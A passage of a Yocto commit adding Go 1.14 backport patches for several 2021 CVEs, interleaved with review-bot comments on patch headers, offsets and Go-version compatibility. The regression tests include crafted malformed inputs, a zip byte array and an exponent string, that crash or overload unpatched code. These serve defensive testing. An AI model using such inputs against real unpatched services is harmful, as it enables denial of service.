43 // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
44 // exponent may be provided as well, except for hexadecimal floats which
45 // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
46-// be distinguished from a mantissa digit).
47+// be distinguished from a mantissa digit). If the exponent's absolute value
48+// is too large, the operation may fail.
49 // The entire string, not just a prefix, must be valid for success. If the
50 // operation failed, the value of z is undefined but the returned value is nil.
51 func (z *Rat) SetString(s string) (*Rat, bool) {
52@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
53 return nil, false
54 }
55 }
56+ if n > 1e6 {
57+ return nil, false // avoid excessively large exponents
58+ }
59 pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
60 if exp5 > 0 {
61 z.a.abs = z.a.abs.mul(z.a.abs, pow5)
62@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
63 }
64
65 // apply exp2 contributions
66+ if exp2 < -1e7 || exp2 > 1e7 {
67+ return nil, false // avoid excessively large exponents
68+ }
69 if exp2 > 0 {
70- if int64(uint(exp2)) != exp2 {
71- panic("exponent too large")
72- }
73 z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
74 } else if exp2 < 0 {
75- if int64(uint(-exp2)) != -exp2 {
76- panic("exponent too large")
77- }
78 z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
79 }
80
81diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
82index b820df4..e55e655 100644
83--- a/src/math/big/ratconv_test.go
84+++ b/src/math/big/ratconv_test.go
85@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
86 }
87 }
88 }
89+
90+func TestIssue45910(t *testing.T) {
91+ var x Rat
92+ for _, test := range []struct {
93+ input string
94+ want bool
95+ }{
96+ {"1e-1000001", false},
97+ {"1e-1000000", true},
98+ {"1e+1000000", true},
99+ {"1e+1000001", false},
100+
101+ {"0p1000000000000", true},
102+ {"1p-10000001", false},
103+ {"1p-10000000", true},
104+ {"1p+10000000", true},
105+ {"1p+10000001", false},
106+ {"1.770p02041010010011001001", false}, // test case from issue
107+ } {
108+ _, got := x.SetString(test.input)
109+ if got != test.want {
110+ t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
111+ }
112+ }
113+}
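Review bot: The header of this patch names three different commits: `c8866491ac42` on the `From` line, `df9ce19db6df` in `Upstream-Status`, and `6c591f79b0b5` in the cherry-pick trailer. The `CVE:` and `Signed-off-by:` block also sits above the original message body instead of after it. For a CVE backport it helps to say which commit the hunks were actually taken from, for example a line under `Upstream-Status` stating that the URL is the release-branch commit and the cherry-pick id is the master commit, if that is the case. Moving the Yocto trailer block below the upstream message would match the layout of the other patches in this commit.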
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
1From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Wed, 9 Jun 2021 11:31:27 -0700
4Subject: [PATCH] crypto/tls: test key type when casting
5
6When casting the certificate public key in generateClientKeyExchange,
7check the type is appropriate. This prevents a panic when a server
8agrees to a RSA based key exchange, but then sends an ECDSA (or
9other) certificate.
10
11Fixes #47143
12Fixes CVE-2021-34558
13
14Thanks to Imre Rad for reporting this issue.
15
16Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
17Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
18Reviewed-by: Filippo Valsorda <valsorda@google.com>
19Reviewed-by: Katie Hockman <katiehockman@google.com>
20Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
21Trust: Filippo Valsorda <filippo@golang.org>
22Run-TryBot: Filippo Valsorda <filippo@golang.org>
23TryBot-Result: Go Bot <gobot@golang.org>
24Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
25
26Upstream-Status: Backport
27https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
28CVE: CVE-2021-34558
29Signed-off-by: Armin Kuster <akuster@mvista.com>
30
31---
32 src/crypto/tls/key_agreement.go | 6 +++++-
33 1 file changed, 5 insertions(+), 1 deletion(-)
34
35Index: go/src/crypto/tls/key_agreement.go
36===================================================================
37--- go.orig/src/crypto/tls/key_agreement.go
38+++ go/src/crypto/tls/key_agreement.go
39@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
40 return nil, nil, err
41 }
42
43- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
44+ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
45+ if !ok {
46+ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
47+ }
48+ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
49 if err != nil {
50 return nil, nil, err
51 }
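Review bot: No regression test covers the new `!ok` branch in rsaKeyAgreement.generateClientKeyExchange. The diffstat lists only key_agreement.go, while most other CVE backports in this commit bring a test with them. A client handshake test would keep the panic from returning: negotiate an RSA key-exchange suite, present a peer certificate with a non-RSA key, and assert the `tls: server certificate contains incorrect key type for selected ciphersuite` error. The function's body starts and ends outside the hunk, so how the caller reports this error to the peer cannot be checked here.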
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
1From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 7 Jul 2021 16:34:34 -0700
4Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
5
6Reading from an incoming request body after the request handler aborts
7with a panic can cause a panic, becuse http.Server does not (contrary
8to its documentation) close the request body in this case.
9
10Always close the incoming request body in ReverseProxy.ServeHTTP to
11ensure that any in-flight outgoing requests using the body do not
12read from it.
13
14Updates #46866
15Fixes CVE-2021-36221
16
17Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
18Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
19Trust: Damien Neil <dneil@google.com>
20Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
21Reviewed-by: Filippo Valsorda <filippo@golang.org>
22
23https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e
24CVE: CVE-2021-36221
25Upstream-Status: Backport
26Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
27---
28 src/net/http/httputil/reverseproxy.go | 9 +++++
29 src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
30 2 files changed, 48 insertions(+)
31
32diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
33index 5d39955d62d15..8b63368386f43 100644
34--- a/src/net/http/httputil/reverseproxy.go
35+++ b/src/net/http/httputil/reverseproxy.go
36@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
37 if req.ContentLength == 0 {
38 outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
39 }
40+ if outreq.Body != nil {
41+ // Reading from the request body after returning from a handler is not
42+ // allowed, and the RoundTrip goroutine that reads the Body can outlive
43+ // this handler. This can lead to a crash if the handler panics (see
44+ // Issue 46866). Although calling Close doesn't guarantee there isn't
45+ // any Read in flight after the handle returns, in practice it's safe to
46+ // read after closing it.
47+ defer outreq.Body.Close()
48+ }
49 if outreq.Header == nil {
50 outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
51 }
52diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
53index 1898ed8b8afde..4b6ad77a29466 100644
54--- a/src/net/http/httputil/reverseproxy_test.go
55+++ b/src/net/http/httputil/reverseproxy_test.go
56@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
57 rproxy.ServeHTTP(httptest.NewRecorder(), req)
58 }
59
60+// Issue #46866: panic without closing incoming request body causes a panic
61+func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
62+ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
63+ out := "this call was relayed by the reverse proxy"
64+ // Coerce a wrong content length to induce io.ErrUnexpectedEOF
65+ w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
66+ fmt.Fprintln(w, out)
67+ }))
68+ defer backend.Close()
69+ backendURL, err := url.Parse(backend.URL)
70+ if err != nil {
71+ t.Fatal(err)
72+ }
73+ proxyHandler := NewSingleHostReverseProxy(backendURL)
74+ proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
75+ frontend := httptest.NewServer(proxyHandler)
76+ defer frontend.Close()
77+ frontendClient := frontend.Client()
78+
79+ var wg sync.WaitGroup
80+ for i := 0; i < 2; i++ {
81+ wg.Add(1)
82+ go func() {
83+ defer wg.Done()
84+ for j := 0; j < 10; j++ {
85+ const reqLen = 6 * 1024 * 1024
86+ req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
87+ req.ContentLength = reqLen
88+ resp, _ := frontendClient.Transport.RoundTrip(req)
89+ if resp != nil {
90+ io.Copy(io.Discard, resp.Body)
91+ resp.Body.Close()
92+ }
93+ }
94+ }()
95+ }
96+ wg.Wait()
97+}
98+
99 func TestSelectFlushInterval(t *testing.T) {
100 tests := []struct {
101 name string
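Review bot: The added test TestReverseProxy_PanicClosesIncomingBody uses `io.Discard` in two places: the `proxyHandler.ErrorLog` setup and the `io.Copy` that drains the response. As far as I know that identifier was introduced in Go 1.16, so reverseproxy_test.go would not compile against the Go 1.14 sources this recipe patches. The test file appears to import `ioutil` already (CVE-2021-33197.patch adds an `ioutil.ReadAll` call to it without touching the imports). The backport can therefore use `log.New(ioutil.Discard, "", 0)` and `io.Copy(ioutil.Discard, resp.Body)` instead. Only the test hunk is affected; the `defer outreq.Body.Close()` change in reverseproxy.go does not depend on it.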
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
1From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
2From: Michael Knyszek <mknyszek@google.com>
3Date: Thu, 2 Sep 2021 16:51:59 -0400
4Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
5 command line args overwrite global data
6
7On Wasm, wasm_exec.js puts command line arguments at the beginning
8of the linear memory (following the "zero page"). Currently there
9is no limit for this, and a very long command line can overwrite
10the program's data section. Prevent this by limiting the command
11line to 4096 bytes, and in the linker ensuring the data section
12starts at a high enough address (8192).
13
14(Arguably our address assignment on Wasm is a bit confusing. This
15is the minimum fix I can come up with.)
16
17Thanks to Ben Lubar for reporting this issue.
18
19Change by Cherry Mui <cherryyz@google.com>.
20
21For #48797
22Fixes #48799
23Fixes CVE-2021-38297
24
25Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
27Reviewed-by: Roland Shoemaker <bracewell@google.com>
28Reviewed-by: Than McIntosh <thanm@google.com>
29Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
30Trust: Michael Knyszek <mknyszek@google.com>
31Reviewed-by: Heschi Kreinick <heschi@google.com>
32
33CVE: CVE-2021-38297
34
35Upstream-Status: Backport:
36https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
37
38Inline of ctxt.isWAsm followin this implemetation:
39https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
40
41Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
42---
43 misc/wasm/wasm_exec.js | 7 +++++++
44 src/cmd/link/internal/ld/data.go | 11 ++++++++++-
45 2 files changed, 17 insertions(+), 1 deletion(-)
46
47diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
48index 82041e6bb901..a0a264278b1b 100644
49--- a/misc/wasm/wasm_exec.js
50+++ b/misc/wasm/wasm_exec.js
51@@ -564,6 +564,13 @@
52 offset += 8;
53 });
54
55+ // The linker guarantees global data starts from at least wasmMinDataAddr.
56+ // Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
57+ const wasmMinDataAddr = 4096 + 4096;
58+ if (offset >= wasmMinDataAddr) {
59+ throw new Error("command line too long");
60+ }
61+
62 this._inst.exports.run(argc, argv);
63 if (this.exited) {
64 this._resolveExitPromise();
65diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
66index 52035e96301c..54a1d188cdb9 100644
67--- a/src/cmd/link/internal/ld/data.go
68+++ b/src/cmd/link/internal/ld/data.go
69@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
70 return sect, n, va
71 }
72
73+// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
74+// to store command line args. Data sections starts from at least address 8192.
75+// Keep in sync with wasm_exec.js.
76+const wasmMinDataAddr = 4096 + 4096
77+
78 // address assigns virtual addresses to all segments and sections and
79 // returns all segments in file order.
80 func (ctxt *Link) address() []*sym.Segment {
81@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
82 order = append(order, &Segtext)
83 Segtext.Rwx = 05
84 Segtext.Vaddr = va
85- for _, s := range Segtext.Sections {
86+ for i, s := range Segtext.Sections {
87 va = uint64(Rnd(int64(va), int64(s.Align)))
88 s.Vaddr = va
89 va += s.Length
90+
91+ if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
92+ va = wasmMinDataAddr
93+ }
94 }
95
96 Segtext.Length = va - uint64(*FlagTextAddr)
97 \ No newline at end of file
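Review bot: This patch file ends without a trailing newline; the `\ No newline at end of file` marker follows the last context line of the data.go hunk. Its header also writes `Upstream-Status: Backport:` with a trailing colon and carries typos in the "Inline of ctxt.isWAsm" remark. Ending the file with a newline avoids a possible truncated-patch warning when it is applied. The status line could use the bracketed form from CVE-2021-33198.patch: `Upstream-Status: Backport [https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564]`. Separately, `wasmMinDataAddr` is now defined in both wasm_exec.js and data.go and linked only by the "Keep in sync" comments, so a later change to one side must update the other in the same patch.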
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
1From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Wed, 18 Aug 2021 11:49:29 -0700
4Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
5 check from overflowing
6
7If the indicated directory size in the archive header is so large that
8subtracting it from the archive size overflows a uint64, the check that
9the indicated number of files in the archive can be effectively
10bypassed. Prevent this from happening by checking that the indicated
11directory size is less than the size of the archive.
12
13Thanks to the OSS-Fuzz project for discovering this issue and to
14Emmanuel Odeke for reporting it.
15
16Fixes #47985
17Updates #47801
18Fixes CVE-2021-39293
19
20Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
21Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
22Trust: Roland Shoemaker <roland@golang.org>
23Run-TryBot: Roland Shoemaker <roland@golang.org>
24TryBot-Result: Go Bot <gobot@golang.org>
25Reviewed-by: Russ Cox <rsc@golang.org>
26(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
27Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
28Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
29Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
30Trust: Cherry Mui <cherryyz@google.com>
31
32https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
33CVE: CVE-2021-39293
34Upstream-Status: Backport
35Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
36---
37 src/archive/zip/reader.go | 2 +-
38 src/archive/zip/reader_test.go | 18 ++++++++++++++++++
39 2 files changed, 19 insertions(+), 1 deletion(-)
40
41diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
42index ddef2b7b5a517..801d1313b6c32 100644
43--- a/src/archive/zip/reader.go
44+++ b/src/archive/zip/reader.go
45@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
46 // indicate it contains up to 1 << 128 - 1 files. Since each file has a
47 // header which will be _at least_ 30 bytes we can safely preallocate
48 // if (data size / 30) >= end.directoryRecords.
49- if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
50+ if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
51 z.File = make([]*File, 0, end.directoryRecords)
52 }
53 z.Comment = end.comment
54diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
55index 471be27bb1004..99f13345d8d06 100644
56--- a/src/archive/zip/reader_test.go
57+++ b/src/archive/zip/reader_test.go
58@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
59 t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
60 }
61 }
62+
63+func TestCVE202139293(t *testing.T) {
64+ // directory size is so large, that the check in Reader.init
65+ // overflows when subtracting from the archive size, causing
66+ // the pre-allocation check to be bypassed.
67+ data := []byte{
68+ 0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
69+ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
70+ 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
71+ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
72+ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
73+ 0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
74+ }
75+ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
76+ if err != ErrFormat {
77+ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
78+ }
79+}
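Review bot: The inner hunks of this patch still carry release-branch line numbers. The reader.go hunk targets line 105 and the test hunk line 1225, while CVE-2021-33196.patch in this same commit places the same code at line 84 of reader.go and appends TestCVE202133196 after line 1070 of reader_test.go. The patch tool will presumably still apply it with an offset. Refreshing it against the go-1.14 tree, after CVE-2021-33196.patch is applied, removes the risk of the one-line guard landing on the wrong context. The context lines include the comment block that CVE-2021-33196.patch adds, so this patch cannot apply without it.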
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
1From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Thu, 14 Oct 2021 13:02:01 -0700
4Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
5 symbol table command
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Fail out when loading a file that contains a dynamic symbol table
11command that indicates a larger number of symbols than exist in the
12loaded symbol table.
13
14Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
15reporting this issue.
16
17Updates #48990
18Fixes #48991
19Fixes CVE-2021-41771
20
21Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
22Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
23Reviewed-by: Julie Qiu <julie@golang.org>
24Reviewed-by: Katie Hockman <katie@golang.org>
25Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
26Run-TryBot: Roland Shoemaker <roland@golang.org>
27TryBot-Result: Go Bot <gobot@golang.org>
28Trust: Katie Hockman <katie@golang.org>
29(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
30Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
31Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
32
33https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
34CVE: CVE-2021-41771
35Upstream-Status: Backport
36Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
37---
38 src/debug/macho/file.go | 9 +++++++++
39 src/debug/macho/file_test.go | 7 +++++++
40 .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
41 3 files changed, 17 insertions(+)
42 create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
43
44diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
45index 085b0c8219bad..73cfce3c7606e 100644
46--- a/src/debug/macho/file.go
47+++ b/src/debug/macho/file.go
48@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
49 if err := binary.Read(b, bo, &hdr); err != nil {
50 return nil, err
51 }
52+ if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
53+ return nil, &FormatError{offset, fmt.Sprintf(
54+ "undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
55+ hdr.Iundefsym, len(f.Symtab.Syms)), nil}
56+ } else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
57+ return nil, &FormatError{offset, fmt.Sprintf(
58+ "number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
59+ hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
60+ }
61 dat := make([]byte, hdr.Nindirectsyms*4)
62 if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
63 return nil, err
64diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
65index 03915c86e23d9..9beeb80dd27c1 100644
66--- a/src/debug/macho/file_test.go
67+++ b/src/debug/macho/file_test.go
68@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
69 t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
70 }
71 }
72+
73+func TestOpenBadDysymCmd(t *testing.T) {
74+ _, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
75+ if err == nil {
76+ t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
77+ }
78+}
79diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
80new file mode 100644
81index 0000000000000..8e0436639c109
82--- /dev/null
83+++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
84@@ -0,0 +1 @@
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
86\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
1From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Thu, 9 Dec 2021 06:13:31 -0500
4Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
7CVE: CVE-2021-44716
8Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
9
10
11Pull in security fix
12
13 a5309b3 http2: cap the size of the server's canonical header cache
14
15Updates #50058
16Fixes CVE-2021-44716
17
18Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
19Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
20Trust: Filippo Valsorda <filippo@golang.org>
21Run-TryBot: Filippo Valsorda <filippo@golang.org>
22Reviewed-by: Alex Rakoczy <alex@golang.org>
23TryBot-Result: Gopher Robot <gobot@golang.org>
24(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
25---
26 src/go.mod | 2 +-
27 src/go.sum | 4 ++--
28 src/net/http/h2_bundle.go | 10 +++++++++-
29 src/vendor/modules.txt | 2 +-
30 4 files changed, 13 insertions(+), 5 deletions(-)
31
32diff --git a/src/go.mod b/src/go.mod
33index ec6bd98..56f2fbb 100644
34--- a/src/go.mod
35+++ b/src/go.mod
36@@ -4,7 +4,7 @@ go 1.14
37
38 require (
39 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
40- golang.org/x/net v0.0.0-20210129194117-4acb7895a057
41+ golang.org/x/net v0.0.0-20211209100217-a5309b321dca
42 golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
43 golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
44 )
45diff --git a/src/go.sum b/src/go.sum
46index 171e083..1ceba05 100644
47--- a/src/go.sum
48+++ b/src/go.sum
49@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
50 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
51 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
52 golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
53-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
54-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
55+golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
56+golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
57 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
58 golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
59 golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
60diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
61index 702fd5a..83f2a72 100644
62--- a/src/net/http/h2_bundle.go
63+++ b/src/net/http/h2_bundle.go
64@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
65 sc.canonHeader = make(map[string]string)
66 }
67 cv = CanonicalHeaderKey(v)
68- sc.canonHeader[v] = cv
69+ // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
70+ // entries in the canonHeader cache. This should be larger than the number
71+ // of unique, uncommon header keys likely to be sent by the peer, while not
72+ // so high as to permit unreaasonable memory usage if the peer sends an unbounded
73+ // number of unique header keys.
74+ const maxCachedCanonicalHeaders = 32
75+ if len(sc.canonHeader) < maxCachedCanonicalHeaders {
76+ sc.canonHeader[v] = cv
77+ }
78 return cv
79 }
80
81diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
82index 669bd9b..1d67183 100644
83--- a/src/vendor/modules.txt
84+++ b/src/vendor/modules.txt
85@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
86 golang.org/x/crypto/hkdf
87 golang.org/x/crypto/internal/subtle
88 golang.org/x/crypto/poly1305
89-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
90+# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
91 ## explicit
92 golang.org/x/net/dns/dnsmessage
93 golang.org/x/net/http/httpguts
